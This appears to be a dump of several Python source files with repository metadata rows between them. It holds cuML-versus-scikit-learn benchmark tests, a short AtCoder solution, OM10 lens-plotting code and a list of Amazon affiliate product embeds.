kwargs["train_split"] = d["train_split"]
if "label_col" in d:
kwargs["label_col"] = d["label_col"]
data = load_data(**kwargs)
if d["module"] == "cuml":
import cudf
if isinstance(data, dict):
for k, v in data.items():
data[k] = cudf.DataFrame.from_pandas(v)
data["y_train"] = cudf.Series(data["y_train"]["fea0"])
else:
data = cudf.DataFrame.from_pandas(data)
return {"module": d["module"], "data": data}
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_PCA(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.decomposition")
else:
m = importlib.import_module("cuml")
def compute_func(data):
kwargs = {
"n_components": 10,
"whiten": False,
"random_state": 42,
"svd_solver": "full",
}
pca = m.PCA(**kwargs)
pca.fit_transform(data["data"])
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{"module": module, "shape": shape, "data": data},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["small"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_DBSCAN(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.cluster")
else:
m = importlib.import_module("cuml")
def compute_func(data):
kwargs = {"eps": 3, "min_samples": 2}
if data["module"] == "sklearn":
kwargs["n_jobs"] = -1
kwargs["algorithm"] = "brute"
dbscan = m.DBSCAN(**kwargs)
dbscan.fit(data["data"])
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{"module": module, "shape": shape, "data": data},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_TSVD(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.decomposition")
else:
m = importlib.import_module("cuml")
def compute_func(data):
kwargs = {"n_components": 10, "random_state": 42}
if data["module"] == "sklearn":
kwargs["algorithm"] = "arpack"
elif data["module"] == "cuml":
kwargs["algorithm"] = "full"
tsvd = m.TruncatedSVD(**kwargs)
tsvd.fit_transform(data["data"])
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{"module": module, "shape": shape, "data": data},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["small"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_KNN(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.neighbors")
else:
m = importlib.import_module("cuml.neighbors.nearest_neighbors")
def compute_func(data):
kwargs = {}
n_neighbors = 10
if data["module"] == "sklearn":
kwargs["metric"] = "sqeuclidean"
kwargs["n_jobs"] = -1
knn = m.NearestNeighbors(**kwargs)
knn.fit(data["data"])
knn.kneighbors(data["data"], n_neighbors)
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{"module": module, "shape": shape, "data": data},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_SGD(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.linear_model")
else:
m = importlib.import_module("cuml.solvers")
def compute_func(data):
kwargs = {
"learning_rate": "adaptive",
"eta0": 0.07,
"penalty": "elasticnet",
"loss": "squared_loss",
"tol": 0.0,
}
if data["module"] == "sklearn":
kwargs["max_iter"] = 10
kwargs["fit_intercept"] = True
sgd = m.SGDRegressor(**kwargs)
elif data["module"] == "cuml":
kwargs["epochs"] = 10
kwargs["batch_size"] = 512
sgd = m.SGD(**kwargs)
X_train = data["data"]["X_train"]
y_train = data["data"]["y_train"]
sgd.fit(X_train, y_train)
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{
"module": module,
"shape": shape,
"data": data,
"train_split": 0.8,
"label_col": 4,
},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_LinearRegression(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.linear_model")
else:
m = importlib.import_module("cuml")
def compute_func(data):
kwargs = {"fit_intercept": True, "normalize": True}
if data["module"] == "cuml":
kwargs["algorithm"] = "eig"
X_train = data["data"]["X_train"]
y_train = data["data"]["y_train"]
lr = m.LinearRegression(**kwargs)
lr.fit(X_train, y_train)
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{
"module": module,
"shape": shape,
"data": data,
"train_split": 0.8,
"label_col": 4,
},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_Ridge(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.linear_model")
else:
m = importlib.import_module("cuml")
def compute_func(data):
kwargs = {"fit_intercept": False, "normalize": True, "alpha": 0.1}
if data["module"] == "cuml":
kwargs["solver"] = "svd"
X_train = data["data"]["X_train"]
y_train = data["data"]["y_train"]
ridge = m.Ridge(**kwargs)
ridge.fit(X_train, y_train)
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{
"module": module,
"shape": shape,
"data": data,
"train_split": 0.8,
"label_col": 4,
},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_Lasso(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.linear_model")
else:
m = importlib.import_module("cuml")
def compute_func(data):
kwargs = {
"alpha": np.array([0.001]),
"fit_intercept": True,
"normalize": False,
"max_iter": 1000,
"selection": "cyclic",
"tol": 1e-10,
}
X_train = data["data"]["X_train"]
y_train = data["data"]["y_train"]
lasso = m.Lasso(**kwargs)
lasso.fit(X_train, y_train)
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{
"module": module,
"shape": shape,
"data": data,
"train_split": 0.8,
"label_col": 4,
},
)
@pytest.mark.parametrize("module", ["sklearn", "cuml"])
@pytest.mark.parametrize("shape", _shapes["large"])
@pytest.mark.parametrize("data", ["data/mortgage.npy.gz"])
def test_ElasticNet(benchmark, module, shape, data):
if module == "sklearn":
m = importlib.import_module("sklearn.linear_model")
else:
m = importlib.import_module("cuml")
def compute_func(data):
kwargs = {
"alpha": np.array([0.001]),
"fit_intercept": True,
"normalize": False,
"max_iter": 1000,
"selection": "cyclic",
"tol": 1e-10,
}
X_train = data["data"]["X_train"]
y_train = data["data"]["y_train"]
lasso = m.Lasso(**kwargs)
lasso.fit(X_train, y_train)
run_benchmark(
benchmark,
m,
compute_func,
load_mortgage,
{
"module": module,
"shape": shape,
"data": data,
"train_split": 0.8,
"label_col": 4,
},
)
| 26.841727 | 82 | 0.54132 | 0 | 0 | 0 | 0 | 8,530 | 0.762083 | 0 | 0 | 2,476 | 0.22121 |
cdc72216af29eaceb6c114484063fc2831f99596 | 420 | py | Python | ABC127C/resolve.py | staguchi0703/problems_easy | 82804b99b3ce8104762c3f6f5cc60b009a17bdc8 | [
"MIT"
]
| null | null | null | ABC127C/resolve.py | staguchi0703/problems_easy | 82804b99b3ce8104762c3f6f5cc60b009a17bdc8 | [
"MIT"
]
| null | null | null | ABC127C/resolve.py | staguchi0703/problems_easy | 82804b99b3ce8104762c3f6f5cc60b009a17bdc8 | [
"MIT"
]
| null | null | null | def resolve():
'''
code here
'''
N , M = [int(item) for item in input().split()]
LRs = [[int(item) for item in input().split()] for _ in range(M)]
L_max = 0
R_min = N
for L, R in LRs:
L_max = max(L_max, L)
R_min = min(R_min, R)
delta = R_min - L_max
if delta >= 0:
print(delta + 1)
else:
print(0)
if __name__ == "__main__":
resolve()
| 16.8 | 69 | 0.490476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.083333 |
cdc9ffbc19062cc077e25fb215d33c0447db75e0 | 7,109 | py | Python | om10/plotting.py | drphilmarshall/OM10 | 009c16f0ef4e1c5f8f78c78df3c7711b7be24938 | [
"MIT"
]
| 5 | 2017-02-17T19:43:54.000Z | 2021-05-19T09:30:53.000Z | om10/plotting.py | drphilmarshall/OM10 | 009c16f0ef4e1c5f8f78c78df3c7711b7be24938 | [
"MIT"
]
| 55 | 2015-02-06T19:25:58.000Z | 2021-03-09T07:57:04.000Z | om10/plotting.py | drphilmarshall/OM10 | 009c16f0ef4e1c5f8f78c78df3c7711b7be24938 | [
"MIT"
]
| 16 | 2015-01-29T23:55:45.000Z | 2021-04-16T03:06:38.000Z | # ======================================================================
# Globally useful modules, imported here and then accessible by all
# functions in this file:
from __future__ import print_function
# Fonts, latex:
import matplotlib
matplotlib.rc('font',**{'family':'serif', 'serif':['TimesNewRoman']})
matplotlib.rc('text', usetex=True)
import corner
import pylab, sys, numpy as np
# ======================================================================
def plot_sample(sample, saveImg=False, fig=None, color='black',
parameters=('MAGI','IMSEP','VELDISP','ZLENS','ZSRC')):
"""
Given an OM10 sample, make a corner plot of the required quantities.
Parameters
----------
parameters : str, tuple
Names of the lens parameters to plot
saveImg : bool
If true, save image with standardized name.
IQ : float
Image quality, for reference.
fig : matplotlib figure object
Overlay plot on an existing figure
Returns
-------
fig : matplotlib figure object
New or updated figure
"""
features, labels = extract_features(sample, parameters)
if fig is None:
fig = corner.corner(features, labels=labels, color=color, smooth=1.0)
else:
_ = corner.corner(features, labels=labels, color=color, smooth=1.0, fig=fig)
for ax in fig.axes:
for item in ([ax.xaxis.label, ax.yaxis.label]):
item.set_fontsize(20)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(16)
if saveImg:
pngfile = "om10_sample.png"
pylab.savefig(pngfile)
print("OM10: Sample plot saved to file:", pngfile)
return fig
# ======================================================================
def extract_features(x, names):
"""
Given an OM10 table of lenses, extract the required parameters and
provide labels for them.
Parameters
----------
x : Table
OM10 lens sample.
names : str, tuple
Names of features required.
Returns
-------
features : float, ndarray
Values of requested features, for each lens in the Table
labels : str, list
Corresponding axis labels
"""
features = np.array([])
labels = []
p = len(names)
n = len(x)
for name in names:
features = np.append(features, x[name])
labels.append(axis_labels[name])
return features.reshape(p,n).transpose(), labels
# ======================================================================
def plot_lens(lens, saveImg=False, IQ=0.7):
"""
Given an OM10 lens, compute some basic quantities
and use them to plot a cartoon visualization of the lens.
Parameters
----------
saveImg : bool
If true, save image with standardized name.
IQ : float
Image quality, for reference.
"""
# # Force matplotlib to not use any Xwindows backend:
# if saveImg:
# try: matplotlib.use('Agg')
# except: pass
# else:
# try: matplotlib.use('TkAgg')
# except: pass
# Pull out data for ease of use:
id = lens['LENSID'][0]
xi = lens['XIMG'][0]
yi = lens['YIMG'][0]
nim = lens['NIMG'][0]
mui = lens['MAG'][0]
md = lens['APMAG_I'][0]
ms = lens['MAGI_IN'][0]
xs = lens['XSRC'][0]
ys = lens['YSRC'][0]
xd = 0.0
yd = 0.0
zd = lens['ZLENS'][0]
zs = lens['ZSRC'][0]
q = 1.0 - lens['ELLIP'][0]
phi = lens['PHIE'][0]
print("OM10: Plotting image configuration of lens ID ",id)
# Compute image magnitudes:
mi = np.zeros(nim)
lfi = np.zeros(nim)
for i in range(nim):
mi[i] = ms - 2.5*np.log10(np.abs(mui[i]))
lfi[i] = 0.4*(24-mi[i])
print("OM10: lens, image magnitudes:",md,mi)
lfd = 0.4*(24-md)
# print("om10.plot_lens: lens, image log fluxes:",lfd,lfi)
# ------------------------------------------------------------------
# Compute caustics and critical curves:
# ------------------------------------------------------------------
# Start figure:
fig = pylab.figure(figsize=(8,8))
# ,aspect='equal')
# Axes limits, useful sizes:
xmax = 1.99
dm = 1.0/10
# Plot command sets its own axes. 'bp' = blue pentagons
# pylab.plot(xi, yi, 'bp')
pylab.plot(xi, yi, color='blue', \
marker='+', markersize=10, markeredgewidth=2, \
linestyle='')
pylab.plot(xs, ys, color='lightblue', \
marker='+', markersize=10, markeredgewidth=2, \
linestyle='')
pylab.plot(xd, yd, color='orange', \
marker='+', markersize=10, markeredgewidth=2, \
linestyle='')
# Ellipse to represent lens brightness:
ell = matplotlib.patches.Ellipse((xd,yd), width=2*dm*lfd, height=2*q*dm*lfd, angle=phi, alpha=0.2, fc='orange')
pylab.gca().add_patch(ell)
# Circles to represent image brightness:
for i in range(nim):
cir = pylab.Circle((xi[i],yi[i]), radius=dm*lfi[i], alpha=0.2, fc='blue')
pylab.gca().add_patch(cir)
# Circle to represent seeing:
cir = pylab.Circle((1.5,-1.5), radius=IQ/2.0, alpha=0.1, fc='grey')
pylab.gca().add_patch(cir)
text = '{:3.1f}" seeing'.format(IQ)
pylab.annotate(text, (370,5), xytext=None, fontsize=14, \
xycoords='axes points',textcoords='axes points')
# Legend giving lens, source redshift:
text1 = "$z_d$ = %5.2f" % zd
text2 = "$z_s$ = %5.2f" % zs
pylab.annotate(text1, (10,430), xytext=None, fontsize=14, \
xycoords='axes points',textcoords='axes points')
pylab.annotate(text2, (10,410), xytext=None, fontsize=14, \
xycoords='axes points',textcoords='axes points')
# Plot title:
title = "OM10 lensed QSO, ID="+str(id)
pylab.title(title,fontsize=20)
# Set axes labels:
pylab.xlabel("x / arcsec",fontsize=20)
pylab.ylabel("y / arcsec",fontsize=20)
# Set axis limits:
pylab.axis([-xmax,xmax,-xmax,xmax])
# Add a grid:
pylab.grid(color='grey', linestyle='--', linewidth=0.5)
# Plot graph to file:
if saveImg:
pngfile = "om10_qso_ID="+str(id)+".png"
pylab.savefig(pngfile)
print("OM10: Lens plot saved to file:",pngfile)
# ======================================================================
axis_labels = {}
axis_labels['ZLENS'] = '$z_{\\rm d}$'
axis_labels['VELDISP'] = '$\sigma_{\\rm d}$ / km/s'
axis_labels['ELLIP'] = '$\epsilon_{\\rm d}$'
axis_labels['PHIE'] = '$\phi_{\\rm d}$ / km/s'
axis_labels['GAMMA'] = '$\gamma$'
axis_labels['PHIG'] = '$\phi_{\gamma}$'
axis_labels['ZSRC'] = '$z_{\\rm s}$'
axis_labels['MAGI'] = '$i_3$'
axis_labels['MAGI_IN'] = '$i_{\\rm s}$'
axis_labels['IMSEP'] = '$\Delta \\theta$ / arcsec'
axis_labels['i_SDSS_lens'] = '$i_{\\rm d}$ (AB mag)'
axis_labels['i_SDSS_quasar'] = '$i_{\\rm s}$ (AB mag)'
axis_labels['ug'] = '$u-g$ color'
axis_labels['gr'] = '$g-r$ color'
axis_labels['ri'] = '$r-i$ color'
axis_labels['iz'] = '$i-z$ color'
axis_labels['ug'] = '$u-g$ color'
| 30.251064 | 115 | 0.549163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,489 | 0.490786 |
cdcae84167fb352d7727b5d25c865135e36f6d5e | 25,254 | py | Python | applications/EsteEuQuero/models/produto.py | vgcarvpro/vgcarvpro | 16d720cb49f02e4f859c27901360b34681e986c0 | [
"BSD-3-Clause"
]
| null | null | null | applications/EsteEuQuero/models/produto.py | vgcarvpro/vgcarvpro | 16d720cb49f02e4f859c27901360b34681e986c0 | [
"BSD-3-Clause"
]
| null | null | null | applications/EsteEuQuero/models/produto.py | vgcarvpro/vgcarvpro | 16d720cb49f02e4f859c27901360b34681e986c0 | [
"BSD-3-Clause"
]
| null | null | null | # -*- coding: utf-8 -*-
def produtos():
prod = [["Rack de Teto Uno 2010 2011 2012 2013 2014 2015 a 2020 Preto", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=qf_sp_asin_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YN8SCNQ&asins=B07YN8SCNQ&linkId=34c49f7cad089ab50501bec4ef1ba73d&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Rack de Teto Uno 1984 1985 1986 1987 1988 1989 a 2013 Preto", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=qf_sp_asin_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YN8GC65&asins=B07YN8GC65&linkId=bc9faaa23de411cc3b993d88665e5789&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Console PlayStation 4 Pro 4K 1TB - Edição Fortnite - PlayStation 4 (Versão Nacional)",'<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07Z6TBZB8&asins=B07Z6TBZB8&linkId=be458f38f2328c80cb1274652c578c8d&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "consoles" ], ["Console PlayStation®5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B088GNRX3J&asins=B088GNRX3J&linkId=efae8896bbf7f8da6c1aad08c3ab276c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles"], ["HyperX ChargePlay Duo - Carregador Duplo para Controle de PS4, HyperX, Preto/Cinza",'<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07LGN8SCG&asins=B07LGN8SCG&linkId=ea42fc53d108753eb08e89eb3b18c871&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles" ], ["Controle DualSense - PlayStation 5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B088GNW267&asins=B088GNW267&linkId=80d3ac67d0d30ad5da6aac1c13e2e621&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles"], ["Controle Dualshock 4 - PlayStation 4 - Camuflado", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07QKGCYCQ&asins=B07QKGCYCQ&linkId=6aaa982b76d5f442870d9403c6584db6&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles" ], ["Controle de Mídia - PlayStation 5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B08CWL62PL&asins=B08CWL62PL&linkId=aed29d1bf4b31ee03d405a1eba7f3a45&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles"], ["Câmera HD - PlayStation 5", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B08CWHVZJ4&asins=B08CWHVZJ4&linkId=5a4363962def720e113160526c328c60&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>',"consoles" ], ["Multimidia Mp5 RS-505MP5 Com Câmera De Ré RS-121BR E Sensor De Estacionamento RS-104BR PRETO FOSCO", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B084XCCJNR&asins=B084XCCJNR&linkId=28f184b7039f64425de34cf824c10057&show_border=true&link_opens_in_new_window=false&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>' ,"consoles"], ["Carregador Bateria 12v 10ah Carro Moto Flutuante Cf10", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B083ZJ1S2L&asins=B083ZJ1S2L&linkId=6163a1d72b81519d03b3b1b89d379158&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Doctor Shine Revitalizador de Plásticos 500ml Cadillac", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07Y5LLWRH&asins=B07Y5LLWRH&linkId=9abc58fb6c99c067cd013445d7289311&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Central multimídia Mp5 2Din TV/USB/SD/AUX/BT Espelhamento Android e IOS H-tech HT-3220TV", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B08B447ZK2&asins=B08B447ZK2&linkId=9b5e385e0690c4d99a18cbaddd435647&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SSD A400, Kingston, SA400S37/240G, Cinza", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B01N5IB20Q&asins=B01N5IB20Q&linkId=9e38bf171a9c4da3d5c51ba38795a2bc&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["HD SSD Kingston SA400S37 480GB", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B075BKXSCQ&asins=B075BKXSCQ&linkId=2dbddb6517fd79e479deaf77f6ea75ad&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["SA400S37120G - SSD de 120GB Série A400 2,5 Sata III", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B01N6JQS8C&asins=B01N6JQS8C&linkId=28d62e33f5f79e0d2a583a5477143b09&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["SSD Desktop Notebook SATA ADATA ASU630SS-960GQ-R SU630 960GB 2.5 SATA III", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07KQXKK12&asins=B07KQXKK12&linkId=a44675fef616674decca14e99b3595f0&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "informatica"], ["Injeção Eletrônica Programável FT450 - com Chicote 3m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPH1Z5&asins=B07YNPH1Z5&linkId=1a35048d718fb05776eb6a2b3fcce590&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT350 - com Chicote 3m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPYP1S&asins=B07YNPYP1S&linkId=01bf12a8e0d9d58d7521226708c94457&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT550 - Com Chicote 3m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZWHXCFL&asins=B07ZWHXCFL&linkId=f45ed1df394c592cdf5af122ad04dfff&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT600 SFI - Sem Chicote", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZWD5SSP&asins=B07ZWD5SSP&linkId=fb1d67279809593c7f6fe2cc87e774e9&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Injeção Eletrônica Programável FT500LITE SFI - Sem Chicote", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZZKRG9Y&asins=B07ZZKRG9Y&linkId=de11c3a8cfc5eeaac8a7764790a1e08c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Wide Band O2 Datalogger - LSU 4.2 - Lambda/com Chicote 2m Fueltech", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP9X7Y&asins=B07YNP9X7Y&linkId=b4ecfe37f1619e7dbb27628fdaaf465d&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-8 / com Chicote 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" 